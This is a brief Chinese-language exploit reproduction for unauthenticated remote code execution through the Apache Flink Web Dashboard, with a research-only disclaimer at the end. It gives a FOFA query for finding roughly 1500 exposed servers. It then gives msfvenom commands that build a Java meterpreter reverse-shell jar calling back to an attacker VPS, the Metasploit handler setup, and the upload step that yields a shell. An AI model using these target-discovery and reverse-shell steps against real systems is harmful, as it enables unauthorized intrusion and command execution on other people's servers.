【漏洞复现】Apache Flink Web Dashboard 未授权访问导致RCE

一、漏洞危害

Apache Flink Web Dashboard 未授权访问，上传恶意jar导致远程代码命令执行漏洞复现

高危，能远程执行任意命令

二、影响程度

利用fofa搜索本程序，关键词：app="Apache-Flink" ，接近1500台，初步尝试发现命中率较高。

三、漏洞复现

访问出现此页面功能模块，证明可能存在漏洞

3.1 MSF监听

第一步：生成需要上传的jar包

msf监听：

>msfvenom -p java/meterpreter/reverse_tcp LHOST=VPS LPORT=VPS_PORT -f jar > rce.jar

第二步：监听端口

>use exploits/multi/handler

>set PAYLOAD java/meterpreter/reverse_tcp

>set LHOST your_ip

>exploit -j

第三步：上传文件，点击submit

上传之后点击submit

获取shell

执行命令

四、免责声明

本文中提到的漏洞利用Poc和脚本仅供研究学习使用，请遵守《网络安全法》等相关法律法规。